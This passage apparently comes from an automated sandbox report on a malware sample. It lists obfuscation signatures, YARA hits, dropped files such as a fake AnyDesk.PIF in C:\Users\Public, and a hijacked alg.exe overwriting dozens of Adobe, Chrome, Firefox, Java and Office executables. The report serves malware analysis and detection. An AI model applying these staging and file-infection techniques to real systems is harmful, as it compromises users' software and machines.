                      Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdbTTT source: alg.exe, 0000001D.00000003.1954090127.0000000001660000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: FXSSVC.pdbGCTL source: Native_neworigin.exe, 0000001B.00000003.1644259863.0000000005330000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdb source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_userers\32BitMAPIuserer.pdb source: alg.exe, 0000001D.00000003.2424853674.0000000000620000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\CRLogTransport\public\binary\Win\x64\Release\CRLogTransport.pdbQ source: alg.exe, 0000001D.00000003.2297694474.0000000000450000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 0000001D.00000003.2627543341.0000000000620000.00000004.00001000.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: Yara match File source: 15.2.AnyDesk.PIF.2df0000.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000003.1311999021.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 27.2.Native_neworigin.exe.52d0f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 27.2.Native_neworigin.exe.405c190.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 27.2.Native_neworigin.exe.2b6711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: alpha.exe.8.dr Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0894C LoadLibraryW,GetProcAddress,FreeLibrary,15_2_02E0894C
                      Source: AnyDesk.PIF.14.dr Static PE information: real checksum: 0x0 should be: 0x12fdf5
                      Source: FXSSVC.exe.27.dr Static PE information: real checksum: 0xa20cd should be: 0x13585e
                      Source: Trading_AIBot.exe.25.dr Static PE information: real checksum: 0x0 should be: 0x16b30
                      Source: aymtmquJ.pif.15.dr Static PE information: real checksum: 0x0 should be: 0x1768a
                      Source: Juqmtmya.PIF.23.dr Static PE information: real checksum: 0x0 should be: 0x12fdf5
                      Source: armsvc.exe.25.dr Static PE information: real checksum: 0x32318 should be: 0x148a40
                      Source: alpha.exe.8.dr Static PE information: section name: .didat
                      Source: kn.exe.10.dr Static PE information: section name: .didat
                      Source: alpha.pif.21.dr Static PE information: section name: .didat
                      Source: armsvc.exe.25.dr Static PE information: section name: .didat
                      Source: alg.exe.27.dr Static PE information: section name: .didat
                      Source: FXSSVC.exe.27.dr Static PE information: section name: .didat
                      Source: C:\Users\Public\kn.exe Code function: 12_2_00007FF627A73668 push rsp; ret 12_2_00007FF627A73669
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E1D2FC push 02E1D367h; ret 15_2_02E1D35F
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DF63B0 push 02DF640Bh; ret 15_2_02DF6403
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DF63AE push 02DF640Bh; ret 15_2_02DF6403
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DFC349 push 8B02DFC1h; ret 15_2_02DFC34E
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E1C378 push 02E1C56Eh; ret 15_2_02E1C566
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DF332C push eax; ret 15_2_02DF3368
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E1D0AC push 02E1D125h; ret 15_2_02E1D11D
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0306B push 02E030B9h; ret 15_2_02E030B1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0306C push 02E030B9h; ret 15_2_02E030B1
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E1D1F8 push 02E1D288h; ret 15_2_02E1D280
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E1D144 push 02E1D1ECh; ret 15_2_02E1D1E4
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0F108 push ecx; mov dword ptr [esp], edx 15_2_02E0F10D
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DF6784 push 02DF67C6h; ret 15_2_02DF67BE
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DF6782 push 02DF67C6h; ret 15_2_02DF67BE
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DFD5A0 push 02DFD5CCh; ret 15_2_02DFD5C4
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E1C570 push 02E1C56Eh; ret 15_2_02E1C566
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DFC56C push ecx; mov dword ptr [esp], edx 15_2_02DFC571
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0AAE0 push 02E0AB18h; ret 15_2_02E0AB10
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E08AD8 push 02E08B10h; ret 15_2_02E08B08
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0AADF push 02E0AB18h; ret 15_2_02E0AB10
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DFCBEC push 02DFCD72h; ret 15_2_02DFCD6A
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0886C push 02E088AEh; ret 15_2_02E088A6
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E64850 push eax; ret 15_2_02E64920
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02DFC9DE push 02DFCD72h; ret 15_2_02DFCD6A
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E06946 push 02E069F3h; ret 15_2_02E069EB
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E06948 push 02E069F3h; ret 15_2_02E069EB
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E0790C push 02E07989h; ret 15_2_02E07981
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E05E7C push ecx; mov dword ptr [esp], edx 15_2_02E05E7E
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: 15_2_02E02F60 push 02E02FD6h; ret 15_2_02E02FCE
                      Source: AppVClient.exe.27.dr Static PE information: section name: .reloc entropy: 7.936513564869937
                      Source: FXSSVC.exe.27.dr Static PE information: section name: .reloc entropy: 7.9422644511435525
                      Source: 27.2.Native_neworigin.exe.5360000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 27.2.Native_neworigin.exe.52d0f08.5.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 27.2.Native_neworigin.exe.405c190.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
                      Source: 27.2.Native_neworigin.exe.2b6711e.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

                      Persistence and Installation Behavior

                      Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\8c4bfd40d4df6ab2.bin
                      Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
                      Source: C:\Users\Public\Libraries\AnyDesk.PIF File created: C:\Users\Public\Libraries\aymtmquJ.pif
                      Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
                      Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Juqmtmya.PIF
                      Source: C:\Users\Public\kn.exe File created: C:\Users\Public\Libraries\AnyDesk.PIF
                      Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\chrome_pwa_launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7z.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\AppVClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zG.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\notification_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\chrmstp.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrouserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\FXSSVC.exe
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                      Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exeSystem file written: C:\Windows\System32\alg.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\7-Zip\7zFM.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.149\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe
                      Source: C:\Windows\System32\alg.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
